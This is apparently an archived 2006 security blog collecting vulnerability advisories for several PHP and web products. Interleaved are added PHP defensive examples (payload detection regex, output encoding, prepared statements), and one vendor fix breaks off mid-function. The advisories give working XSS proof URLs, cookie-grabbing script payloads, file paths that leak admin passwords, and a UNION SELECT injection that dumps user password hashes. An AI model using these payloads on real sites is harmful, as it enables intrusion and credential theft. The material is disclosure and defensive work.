http://localhost/catalog/admin/orders_status.php?page=1[XSS-code]
http://localhost/catalog/admin/products_attributes.php?page=1[XSS-code]
http://localhost/catalog/admin/products_expected.php?page=1[XSS-code]
http://localhost/catalog/admin/reviews.php?page=1[XSS-code]
http://localhost/catalog/admin/specials.php?page=1[XSS-code]
http://localhost/catalog/admin/stats_products_purchased.php?page=1[XSS-code]
http://localhost/catalog/admin/stats_products_viewed.php?page=1[XSS-code]
http://localhost/catalog/admin/tax_classes.php?page=1[XSS-code]
http://localhost/catalog/admin/tax_rates.php?page=1[XSS-code]
http://localhost/catalog/admin/zones.php?page=1[XSS-code]
This is a simple evil URL, but we can make a more elaborate URL
in conjunction with other files that are not vulnerable... like this:
http://localhost/catalog/admin/categories.php?action=new_product_preview&read=only&pID=12&origin=stats_products_viewed.php?page=2[XSS-code]
######################## €nd #####################
Thanks to Estrella for being my light.
--
Sincerely:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
Curiosity is what makes the mind move....
Panda ActiveScan XSS vulnerability
Wednesday, August 09, 2006
################################################
Panda ActiveScan XSS vulnerability
Vendor url: http://www.pandasoftware.es or .com
Advisory: http://lostmon.blogspot.com/2006/08/panda-activescan-xss-vulnerability.html
vendor notify:yes exploit available:yes
OSVDB ID:29147
Securitytracker:1016696
BID:19471
################################################
Panda ActiveScan contains a flaw that allows a remote cross site
scripting attack. This flaw exists because the application does
not validate the 'email' variable upon submission to the ascan_6.asp
script. This could allow a user to create a specially crafted URL
that would execute arbitrary code in a user's browser within the
trust relationship between the browser and the server, leading
to a loss of integrity.
##########
versions:
##########
Panda ActiveScan 5.53.00
##########
Solution:
##########
Panda has released a new version of ActiveScan
on 14-08-2006
#########
timeline:
#########
discovered : 01-08-2006
vendor notify :05-08-2006
vendor response :14-08-2006
vendor fix:14-08-2006
disclosure:9-08-2005
################
test
################
http://www.pandasoftware.com/activescan/activescan/ascan_6.asp?IdLang=2&Idvendor=17490&Idpais=63&email=Lostmon@gmail.com%22%3E%3Cscript%3Ealert%28%27XSS%20Vulnerability%27%29%3C/script%3E%26&pais=62&provincia=9&tipousuario=0&enviar=1&ode=0#
######################## €nd #####################
Thanks to Estrella for being my light.
--
Sincerely:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
Curiosity is what makes the mind move....
Multiple Vulnerabilities in PHPMailList 1.8.0
Wednesday, July 05, 2006
########################################################
Multiple Vulnerabilities in PHPMailList 1.8.0
Vendor url: http://php.warpedweb.net/
Advisory: http://lostmon.blogspot.com/2006/07/multiple-vulnerabilities-in.html
Vendor notify: yes Exploitation included: yes
osvdb id:27016,27017,27018
Securitytracker:1016439
BID:18840
FrSIRT: FrSIRT/ADV-2006-2690
########################################################
################
Description
################
PHPMailList is a powerful, yet simple to use, email announcement script.
It allows people to subscribe/unsubscribe through a web-based form,
checking for valid addresses. The web-based administration module allows
the owner to send messages to the list, subscribe/unsubscribe people,
view the list of subscribers, and configure the script. Installation is
simple, and configuration of confirmation messages, welcome messages
and goodbye messages, as well as signatures, are all maintained through
the password protected administration section.
PHPMailList has multiple vulnerabilities: XSS, information disclosure and
plain text administrator username/password disclosure.
##############
versions
##############
PHPMailList 1.8.0 and prior versions
#####################
Cross site scripting
#####################
PHPMailList has a flaw that allows a remote cross site scripting attack.
This flaw exists because the application does not properly validate the
input passed in the email field upon submission to the '/maillist.php'
script. This could allow a user to create a specially crafted URL
that would execute arbitrary code in a user's browser within
the trust relationship between the browser and the server,
leading to a loss of integrity.
######################
Information disclosure
######################
A direct request to the file 'list.dat' reveals the email addresses of all subscribers.
A direct request to the file 'ml_config.dat' reveals all configuration information.
#####################################
Plain text administrator disclosure:
#####################################
A direct request to the file 'ml_config.dat' reveals the admin username
on the first line and the admin password on the second, in plain text.
######################
Timeline
######################
Discovered: 06-jun-2006
Vendor notify: the vendor has no forum and no mail address...
vendor response:-------
Disclosure:06-jul-2006
######################## €nd #####################
Thanks to Estrella for being my light.
--
Sincerely:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
Curiosity is what makes the mind move....
Multiple Cross site scripting in Spymac WOS V
Wednesday, May 17, 2006
##########################################################
Multiple Cross site scripting in Spymac WOS V
Vendor url: http://www.spymac.com
Advisory: http://lostmon.blogspot.com/2006/05/multiple-cross-site-scripting-in.html
Vendor notify: yes Exploit available: yes
OSVDB ID:25925,25926,25927
Securitytracker:1016116
FrSIRT/ADV-2006-1852
##########################################################
Spymac WOS is powered by an integrated collection of Web
and desktop applications that together form "Spymac WOS".
Developed in-house, Spymac WOS is an intelligent environment
featuring patent-pending technology that allows for the creation
of an immersive and visually-stunning Web experience.
Spymac has a flaw that allows a remote cross site scripting attack.
This flaw exists because the application does not validate
multiple variables upon submission to multiple scripts.
This could allow a user to create a specially crafted URL
that would execute arbitrary code in a user's browser within
the trust relationship between the browser and the server,
leading to a loss of integrity.
#######################
Versions
#######################
Spymac WOS V
########################
Solution:
########################
No solution was available at this time.
########################
Examples
########################
To view some of the examples, a client login is needed.
http://[VICTIM]/notes/index.php?action=delete_folder&del_folder=[XSS-CODE]
http://[VICTIM]/notes/index.php?action=empty_trash[XSS-CODE]
http://[VICTIM]/ipod/get_ipod.php?curr=10[XSS-CODE]
http://[VICTIM]/notes/index.php?action=noteform&nick=Lostmon[XSS-CODE]
http://[VICTIM]/login.php?[XSS-CODE]
Some other variables are susceptible to the same flaw.
########################
TIMELINE
########################
Discovered:02-05-2006
Vendor notify:14-05-2006
Vendor response:-------------
Disclosure:17-05-2006
######################## €nd #####################
Thanks to Estrella for being my light.
--
Sincerely:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
Curiosity is what makes the mind move....
Multiple Cross site scripting in dragonflycms
Wednesday, February 22, 2006
######################################################
Multiple Cross site scripting in dragonflycms 9.0.6.1
Vendor url:http://dragonflycms.org/
Advisory: http://lostmon.blogspot.com/2006/02/multiple-cross-site-scripting-in.html
Vendor notify: exploit available: yes
OSVDB ID:23408,23409,23410,23411,23412,23413,23414,23415
Securitytracker:1015661
Secunia:18940
BID:16784
FrSIRT:ADV-2006-0688
######################################################
Description:
"Dragonfly CMS is a powerful, feature-rich, Open Source
content management system (CMS) based on PHP-Nuke 6.5.
We have spent over a year developing Dragonfly CMS,
paying close attention to security and reliability. The
release of Dragonfly marks yet another exciting milestone
in our history."
CPG Dragonfly is vulnerable to cross site scripting that
allows attackers to steal information from users by adding
JavaScript code via some of the parameters used by the CMS
product.
######################
Versions
######################
prior to Dragonfly 9.0.6.1
#########################
Solution
########################
No solution was available at this time.
##########################
Timeline
##########################
discovered:12-02-2006
vendor notify:20-02-2006 (web form "contact us")
vendor response:---------
disclosure:22-02-2006
#############################
XSS in module 'Your_Account'
#############################
http://[Victim]/index.php?name=Your_Account&error=1&uname=bGFsYWxh"><script>alert(document.cookie)</script>
http://[Victim]/index.php?name=Your_Account&error=1"><script>alert(document.cookie)</script>&uname=bGFsYWxh
http://[Victim]/index.php?name=Your_Account&profile=3"><script>alert(document.cookie)</script>
http://[Victim]/index.php?name=Your_Account&error=1&uname=PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ+
This PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ+
is this "><script>alert(document.cookie)</script>
encoded in base64: a base64 cross site scripting, where the XSS code is encoded in base64.
The username field is vulnerable too:
insert <script>alert()</script> in the box
and this code is executed...
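As an added example (not Dragonfly CMS code), a request filter that decodes every query parameter before inspecting it, so the base64-encoded 'uname' payload above is caught as well as the plain form; the sample URLs are constructed from the advisory's examples with a placeholder host, and the function names are this example's own.

```php
<?php
// Added example, not Dragonfly CMS code: inspect every query parameter raw,
// URL-decoded and base64-decoded, so a payload hidden in base64 (the 'uname'
// case in the advisory) is flagged the same as a plain "><script> one.

// Markup fragments a reflected payload needs in order to execute. A filter
// like this is a detection aid, not a substitute for escaping output.
function looks_like_markup($value)
{
    return (bool) preg_match(
        '/<\s*\/?\s*(script|img|svg|iframe|body)\b|\bon(error|load|click|mouseover|focus)\s*=|javascript\s*:/i',
        $value
    );
}

// All decodings of one raw query value worth inspecting.
function decodings($raw)
{
    $decoded = rawurldecode($raw);
    $out = array($raw, $decoded);
    // Strict base64: any character outside the alphabet makes it return
    // false, so ordinary values such as 'Your_Account' are simply skipped.
    $b64 = base64_decode($decoded, true);
    if ($b64 !== false && $b64 !== '') {
        $out[] = $b64;
    }
    return $out;
}

// Names of the parameters whose value, in any decoding, looks like markup.
function suspicious_params($url)
{
    $query = parse_url($url, PHP_URL_QUERY);
    if (!is_string($query) || $query === '') {
        return array();
    }
    $hits = array();
    // Split by hand rather than with parse_str(): parse_str() rewrites
    // names (dots, spaces) and keeps only the last of duplicate names.
    foreach (explode('&', $query) as $pair) {
        $parts = explode('=', $pair, 2);
        $name  = $parts[0];
        $raw   = isset($parts[1]) ? $parts[1] : '';
        foreach (decodings($raw) as $candidate) {
            if (looks_like_markup($candidate)) {
                $hits[] = $name;
                break;
            }
        }
    }
    return array_values(array_unique($hits));
}

// Constructed sample requests (host is a placeholder) after the advisory's
// Your_Account examples: a benign one, a plain payload and the base64 form.
$samples = array(
    'http://cms.example/index.php?name=Your_Account&error=1&uname=bGFsYWxh',
    'http://cms.example/index.php?name=Your_Account&profile=3%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E',
    'http://cms.example/index.php?name=Your_Account&error=1&uname=PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ+',
);

foreach ($samples as $url) {
    $hits = suspicious_params($url);
    echo ($hits ? 'SUSPICIOUS ' . implode(',', $hits) : 'clean') . '  ' . $url . "\n";
}
```

The first sample is reported clean (bGFsYWxh decodes to plain text), the second is flagged on 'profile' after URL decoding, and the third only after the base64 decoding step, which is the one a filter that looks at the raw value misses.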
#######################
XSS in module 'News'
#######################
http://[Victim]/index.php?name=News&catid=1"><script>alert()</script>
http://[Victim]/index.php?name=News&file=article&sid=7"><script>alert()</script>
http://[Victim]/index.php?name=News&file=submit
// the textareas 'Story Text' and 'Extended Text' are vulnerable.
http://[Victim]/index.php?name=News&file=friend&sid=5"><script>alert()</script>
#################################
XSS in module 'Stories_Archive'
#################################
http://[Victim]/index.php?name=Stories_Archive&sa=show_month&year=2005&month=11"><script>alert()</script>
http://[Victim]/index.php?name=Stories_Archive&sa=show_month&year=2005"><script>alert()</script>>&month=11
http://[Victim]/index.php?name=Stories_Archive&sa=show_all"><script>alert()</script>
###########################
XSS in module 'Web_Links'
###########################
http://[Victim]/index.php?name=Web_Links&l_op=viewlink&cid=15&min=10&orderby=title%20ASC&show=0"><script>alert(document.cookie)</script>
http://[Victim]/index.php?name=Web_Links&l_op=viewlink&cid=15"><script>alert()</script>
http://[Victim]/index.php?name=Web_Links&l_op=toprated&ratenum=5&ratetype=percent"><script>alert()</script>
http://[Victim]/index.php?name=Web_Links&l_op=viewlink&cid=15&orderby=titled"><script>alert()</script>
###########################
XSS in module 'Surveys'
###########################
http://[Victim]/index.php?name=Surveys&op=results"><script>alert()</script>pollid=3
http://[Victim]/index.php?name=Surveys&op=results&pollid=5"><script>alert()</script>
###########################
XSS in module 'Downloads'
###########################
http://[Victim]/index.php?name=Downloads&c=1"><script>alert()</script>
###########################
XSS in module 'coppermine'
###########################
http://[Victim]/coppermine/thumbnails/meta="><script>alert()</script>topn/album=1.html
http://[Victim]/coppermine/thumbnails/metatopn/album=1.html"><script>alert()</script>
http://[Victim]/index.php?name=coppermine&file=thumbnails&album=1"><script>alert()</script>
############################
XSS in module -Search-
############################
http://[Victim]/index.php?name=Search
User input passed to the search box in the following
modules is not sanitised before being returned to users:
Search
Stories_Archive
Downloads
Topics
If we insert this code "><script>alert()</script> in the search box,
it is executed when we click the Search button.
####################### €nd ############################
Thanks to Estrella for being my light.
--
Sincerely:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
Curiosity is what makes the mind move....
Multiple Cross site scripting in dragonflycms 9.0.6.1
Vendor url:http://dragonflycms.org/
Advisore: http://lostmon.blogspot.com/2006/02/
multiple-cross-site-scripting-in.html
Vendor notify: exploit available: yes
OSVDB ID:23408,23409,23410,23411,23412,23413,23414,23415
Securitytracker:1015661
Secunia:18940
BID:16784
FrSIRT:ADV-2006-0688
######################################################
Description:
"Dragonfly CMS is a powerful, feature-rich, Open Source
content management system (CMS) based on PHP-Nuke 6.5.
We have spent over a year developing Dragonfly CMS,
paying close attention to security and reliability. The
release of Dragonfly marks yet another exciting milestone
in our history."
CPG Dragonfly is vulnerable to cross site scripting that
allow attackers to steal information from users by adding
JavaScript code via some of the parameters used by the CMS
product.
######################
Versions
######################
prior to Dragonfly 9.0.6.1
#########################
Solution
########################
No solution was available at this time.
##########################
Timeline
##########################
discovered:12-02-2006
vendor notify:20-02-2006 (web form "contact us")
vendor response:---------
disclosure:22-02-2006
#############################
XSS in module 'Your_Account'
#############################
http://[Victim]/index.php?name=Your_Account&error=1
&uname=bGFsYWxh"><script>alert(document.cookie)
</script>
http://[Victim]/index.php?name=Your_Account&error=1
"><script>alert(document.cookie)</script>
&uname=bGFsYWxh
http://[Victim]/index.php?name=Your_Account&profile=3
"><script>alert(document.cookie)</script>
http://[Victim]/index.php?name=Your_Account&error=1&uname=
PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ+
this PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ+
is this "><script>alert(document.cookie)</script>
base64 cross site scripting , the XSS code are encoded in base64.
the username field are vulnerable too
insert in the box <script>alert()</script>
and this code is executed...
#######################
XSS in module 'News'
#######################
http://[Victim]/index.php?name=News&catid=1"><script>alert()</script>
http://[Victim]/index.php?name=News&file=article&sid=7"><script>alert()</script>
http://[Victim]/index.php?name=News&file=submit
// texareas 'Story Text' and Extended text are vulnerables.
http://[Victim]/index.php?name=News&file=friend&sid=5"><script>alert()</script>
#################################
XSS in module 'Stories_Archive'
#################################
http://[Victim]/index.php?name=Stories_Archive&sa=show_month
&year=2005&month=11"><script>alert()</script>
http://[Victim]/index.php?name=Stories_Archive&sa=show_month
&year=2005"><script>alert()</script>
>&month=11
http://[Victim]/index.php?name=Stories_Archive&sa=show_all
"><script>alert()</script>
###########################
XSS in module 'Web_Links'
###########################
http://[Victim]/index.php?name=Web_Links&l_op=viewlink
&cid=15&min=10&orderby=title%20ASC&show=0"><script>alert
(document.cookie)</script>
http://[Victim]/index.php?name=Web_Links&l_op=viewlink
&cid=15"><script>alert()</script>
http://[Victim]/index.php?name=Web_Links&l_op=toprated
&ratenum=5&ratetype=percent"><script>alert()</script>
http://[Victim]/index.php?name=Web_Links&l_op=viewlink&cid=15
&orderby=titled"><script>alert()</script>
###########################
XSS in module 'Surveys'
###########################
http://[Victim]/index.php?name=Surveys&op=results
"><script>alert()</script>pollid=3
http://[Victim]/index.php?name=Surveys&op=results&pollid=5
"><script>alert()</script>
###########################
XSS in module 'Downloads'
###########################
http://[Victim]/index.php?name=Downloads&c=1"><script>alert()</script>
###########################
XSS in module 'coppermine'
###########################
http://[Victim]/coppermine/thumbnails/meta=">
<script>alert()</script>
topn/album=1.html
http://[Victim]/coppermine/thumbnails/metatopn/album=1.html
"><script>alert()</script>
http://[Victim]/index.php?name=coppermine&file=thumbnails&album=1
"><script>alert()</script>
############################
XSS in module -Search-
############################
http://[Victim]/index.php?name=Search
User input passed to the search box in the following
modules is not sanitised before being returned to users:
Search
Stories_Archive
Downloads
Topics
If we insert this code in the search box: "><script>alert()</script>
it is executed when we click the Search button.
####################### €nd ############################
Thnx to estrella for being my light
--
Sincerely:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
Curiosity is what makes the mind move....
MANUAL FIX FOR CROSS-SITE SCRIPTING Cubecart 3.0.7 pl1
Monday, January 23, 2006
########################################################
MANUAL FIX FOR CROSS-SITE SCRIPTING Cubecart 3.0.7 pl1
vendor entry: http://bugs.cubecart.com/?do=details&id=459
Advisory: http://lostmon.blogspot.com/2006/01/
cubecart-307-pl1-indexphp-multiple.html
references:
OSVDB ID:22471
Secunia:SA18519
BID:16259
##########################################################
1- includes/functions.inc.php
2- index.php: fix params 'act' and 'searchStr'
3- includes/content/viewCat.inc.php: fix 'catId' param
4- includes/content/viewProd.inc.php: fix 'productId' param
5- cart.php: fix params 'act' and 'searchStr'
6- includes/content/viewDoc.inc.php: fix 'docId' param
7- includes/content/login.inc.php: fix 'act', 'username', 'password', 'remember' and 'redir' params
8- includes/content/tellafriend.inc.php: fix 'productId' param and the $_POST values
9- Thanks
#############################
1 includes/functions.inc.php
#############################
open includes/functions.inc.php and look for this code around line 82:
-------------------------------------------------------
//////////////////////////////////
// treat GET vars stop XSS
////////
function treatGet($text){
$text = preg_replace("/(\
Tuesday, January 10, 2006
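The treatGet() helper above is cut off in this archived copy, and the same class of problem shows up in the base64-encoded 'uname' case in the Your_Account module earlier on this page: stripping or blacklisting characters out of GET values misses whatever encoding the pattern did not anticipate. The following is an added example, not CubeCart's or PHP-Nuke's code, of the fix a reviewer would ask for instead: decode the transport encoding, validate against an allowlist, and encode for HTML at the point of output. The function names (encodeForHtml, readBase64Param, renderUsernameField) and the username allowlist are this example's own assumptions.

```php
<?php
// Added example (not CubeCart's or PHP-Nuke's code): a replacement for a
// regex-based "strip dangerous characters" helper such as treatGet() above.
// Instead of deleting characters, the value is encoded for the HTML context
// it is emitted in, which is the fix that survives encodings a blacklist
// never anticipated. Function names here are this example's own.

declare(strict_types=1);

/**
 * Encode an untrusted string for insertion into HTML text or a quoted
 * attribute value. ENT_QUOTES also encodes the single quote, so the same
 * helper is safe for single-quoted attributes; ENT_SUBSTITUTE replaces
 * invalid UTF-8 instead of returning an empty string.
 */
function encodeForHtml(string $untrusted): string
{
    return htmlspecialchars($untrusted, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

/**
 * Read a request parameter that the application transports base64-encoded
 * (like the 'uname' parameter in the Your_Account module above). Decoding is
 * transport, not validation: the decoded bytes are exactly as untrusted as
 * the raw query string, so they are checked against an allowlist and, when
 * echoed, still pass through encodeForHtml().
 */
function readBase64Param(array $get, string $name): ?string
{
    if (!isset($get[$name]) || !is_string($get[$name])) {
        return null;
    }
    $decoded = base64_decode($get[$name], true);   // strict: reject non-base64 input
    if ($decoded === false) {
        return null;
    }
    // Assumed username policy: letters, digits, dot, dash, underscore, 2-32 chars.
    if (!preg_match('/\A[A-Za-z0-9._-]{2,32}\z/', $decoded)) {
        return null;
    }
    return $decoded;
}

/**
 * Render the login form's username field. Whatever survived validation is
 * still encoded at the point of output, so the fix does not depend on the
 * allowlist being perfect.
 */
function renderUsernameField(?string $username): string
{
    $value = $username === null ? '' : encodeForHtml($username);
    return '<input type="text" name="uname" value="' . $value . '">';
}

// Constructed inputs: a benign base64-encoded username and the base64
// payload quoted in the Your_Account advisory above.
$benign  = ['uname' => base64_encode('alice_01')];
$hostile = ['uname' => 'PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ+'];

echo renderUsernameField(readBase64Param($benign, 'uname')), PHP_EOL;
echo renderUsernameField(readBase64Param($hostile, 'uname')), PHP_EOL;

// Defence in depth: even with the allowlist removed, the output encoder
// turns the decoded payload into inert text.
echo encodeForHtml((string) base64_decode($hostile['uname'], true)), PHP_EOL;
```

The order matters: validation rejects the payload early, but output encoding is the control that holds if a later change loosens the allowlist, which is why the renderer encodes unconditionally rather than trusting its caller.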
################################################
CubeCart 3.0.7-pl1 multiple variable Cross site scripting
Vendor url: www.cubecart.com
bug report:http://bugs.cubecart.com/?do=details&id=459
Advisory: http://lostmon.blogspot.com/2006/01/
cubecart-307-pl1-indexphp-multiple.html
Vendor notify: yes Exploit available: yes
OSVDB ID:22471
Secunia:SA18519
BID:16259
################################################
I recommend that all vendors read this paper
on the new possible impact of XSS attacks:
http://www.bindshell.net/papers/xssv.html
CubeCart contains a flaw that allows a remote cross site scripting
attack. This flaw exists because the application does not validate
some variables upon submission to the 'index.php' scripts.
This could allow a user to create a specially crafted URL that
would execute arbitrary code in a user's browser within the trust
relationship between the browser and the server, leading to a
loss of integrity.
###############
VERSIONS
###############
CubeCart 3.0.7-pl1 is vulnerable.
Other versions are possibly vulnerable too.
#################
Timeline
#################
Discovered: 24-12-2005
Vendor notify: 10-01-2006
Vendor response:
Solution:
Disclosure: 10-01-2006
Public disclosure: 16-01-2006
###############
Examples:
###############
http://victim]/cc3/cart.php?act=reg&redir=L3NpdGUvZGVt
by9jYzMvaW5kZXgucGhwP3NlYXJjaFN0cj0lMjIlM0UlM0NzY3JpcH
QlM0VhbGVydCUyOCUyOSUzQyUyRnNjcmlwdCUzRSZhbXA7YWN0PXZpZ
XdDYXQmYW1wO1N1Ym1pdD1Hbw===%3D%22%3E%3Cscript
%3Ealert%28document.cookie%29%3C%2Fscript%3E
http://[victim]/cc3/cart.php?act=reg&redir==%3D%22%3E%3Cscript
%3Ealert%28document.cookie%29%3C%2Fscript%3E
http://[victim]cc3/index.php?searchStr=%3D%22%3E%3Cscript
%3Ealert%28document.cookie%29%3C%2Fscript%3E&act=viewCat
&Submit=Go
http://[victim]cc3/index.php?act=login&redir=L3NpdG
UvZGVtby9jYzMvaW5kZXgucGhwP2FjdD12aWV3RG9jJmFtcDtkb
2NJZD0x=%3D%22%3E%3Cscript
%3Ealert%28document.cookie%29%3C%2Fscript%3E
http://victim]/cc3/index.php?act=viewProd&productId=1"><script>
alert(document.cookie)</script>
http://victim]/cc3/index.php?act=viewDoc&docId=3"><script>
alert(document.cookie)</script>
http://victim]/cc3/index.php?act=viewProd"><script>
alert(document.cookie)</script>
http://victim]/cc3/index.php?act=viewCat&catId=1"><script>
alert(document.cookie)</script>
http://victim]/cc3/index.php?act=viewCat&catId=saleItems"><script>
alert(document.cookie)</script>
http://victim]/cc3/index.php?searchStr=%22%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E&act=viewCat
http://victim]/cc3/index.php?act=viewDoc&docId=1"><script>
alert(document.cookie)</script>
#################
User field XSS
#################
Go to http://[victim]/cc3/index.php?act=login
and insert this in the username field: "><script>
alert(document.cookie)</script>
#############
SOLUTION
#############
No solution was available at this time.
Currently I have found a possible fix, see
http://lostmon.blogspot.com/2006/01/
manual-fix-for-cross-site-scripting.html
or
http://bugs.cubecart.com/?do=details&id=459
##################### €nd ########################
Thnx to estrella for being my light
Thnx to all manglers of http://www.osvdb.org
--
Sincerely:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
Curiosity is what makes the mind move....
PHPNuke EV 7.7 'search' module 'query' variable SQL injection
Monday, January 09, 2006
###############################################
PHPNuke EV 7.7 'search' module 'query' variable SQL injection
Vendor url: http://nukevolution.com/
Exploit available: yes Vendor notify: yes
Advisory: http://lostmon.blogspot.com/2006/01/
phpnuke-ev-77-search-module-query.html
OSVDB ID: 22316 (related OSVDB: 21002 and 20866)
BID: 16186
Secunia: SA18394 (related Secunia: SA17638 and SA17543)
################################################
PHPNuke EV 7.7 has a flaw which can be exploited by malicious
people to conduct SQL injection attacks.
Input passed to the "query" parameter when performing a search isn't
properly sanitised before being used in a SQL query. This can be
exploited to manipulate SQL queries by injecting arbitrary SQL code.
#################
versions:
################
PHPNuke EV 7.7 -R1
Prior versions are possibly affected.
##################
solution:
###################
No solution at this time!!!
A possible fix:
open the file modules/Search/index.php and, after this code:
------------------------------------
require_once("mainfile.php");
$instory = '';
$module_name = basename(dirname(__FILE__));
get_lang($module_name);
----------------------------------------------
add this:
------------------------------------
if(eregi("UNION SELECT",$query) || eregi("UNION%20SELECT",$query)){
die();
}
----------------------------------------------
This is a "simple fix": it only detects the UNION SELECT command and dies
if it appears in the query variable... you can write the same code
for UNION ALL SELECT or other variants of the exploit.
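The check above is a keyword blacklist: it recognises one spelling of one keyword, and the author already notes that every variant needs its own line. Note also that eregi() and the rest of the ereg family were removed in PHP 7.0, so the posted check fails with an undefined-function error on current PHP. The durable fix is to keep the request string out of the SQL text entirely by binding it as a parameter. The following is an added example, not PHPNuke EV's code; the stories table, its columns and the function names are constructed for the demo, and PDO with an in-memory SQLite database is used only so that it runs offline.

```php
<?php
// Added example (not PHPNuke EV's code). A prepared statement replaces the
// UNION SELECT keyword check: the search term is bound as data, so no part
// of the request can become SQL syntax. Table and column names are constructed.

declare(strict_types=1);

// Pattern the blacklist above was guarding (do not use): the request string
// is spliced into the SQL text, e.g. "... WHERE title LIKE '%$query%'".
// Any keyword filter placed in front of that is only a partial stop-gap.

/**
 * Escape LIKE metacharacters so a user can search for a literal '%' or '_'.
 * The backslash is declared as the ESCAPE character in the query below.
 */
function escapeLikeTerm(string $term): string
{
    return str_replace(['\\', '%', '_'], ['\\\\', '\\%', '\\_'], $term);
}

/**
 * Search story titles and text for $query. The term is bound with
 * bindValue(), so quotes, parentheses, "UNION" or "/*" inside it are
 * compared as characters by the database engine, never parsed as SQL.
 */
function searchStories(PDO $db, string $query): array
{
    $sql = <<<'SQL'
SELECT sid, title FROM stories
WHERE title LIKE :title_term ESCAPE '\'
   OR hometext LIKE :text_term ESCAPE '\'
ORDER BY sid
SQL;
    $pattern = '%' . escapeLikeTerm($query) . '%';
    $stmt = $db->prepare($sql);
    // Two placeholders: PDO does not allow reusing one named marker unless
    // prepare emulation is enabled.
    $stmt->bindValue(':title_term', $pattern, PDO::PARAM_STR);
    $stmt->bindValue(':text_term', $pattern, PDO::PARAM_STR);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

/** Constructed in-memory database so the example runs offline. */
function buildDemoDatabase(): PDO
{
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE stories (sid INTEGER PRIMARY KEY, title TEXT, hometext TEXT)');
    $db->exec("INSERT INTO stories (title, hometext) VALUES
        ('Release notes 7.7', 'What is new in the search module'),
        ('100% uptime', 'A story about reliability')");
    return $db;
}

$db = buildDemoDatabase();

// An ordinary search term.
print_r(searchStories($db, 'search'));

// A term containing a LIKE metacharacter, matched literally thanks to escapeLikeTerm().
print_r(searchStories($db, '100%'));

// The advisory's proof string (abbreviated) is just another literal here:
// it is compared character by character and cannot reshape the statement.
print_r(searchStories($db, "s%') UNION SELECT ... FROM nuke_users/*"));
```

With the term bound as a parameter there is nothing left for a keyword filter to do, so the eregi() check and its maintenance burden of enumerating variants can be dropped altogether.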
####################
Timeline
####################
discovered:21-11-2005
vendor notify:29-12-2005 (forums)
vendor response:-------
vendor fix:-----
disclosure:09-01-2006
###################
example:
###################
Go to
http://[Victim]/modules.php?name=Search
and write this proof in the search box:
s%') UNION SELECT 0,user_id,username,user_password,0,0,0,0,0,0 FROM nuke_users/*
All user hashes become available to view..
#################### €nd ########################
Thnx to estrella for being my light
--
Sincerely:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
Curiosity is what makes the mind move....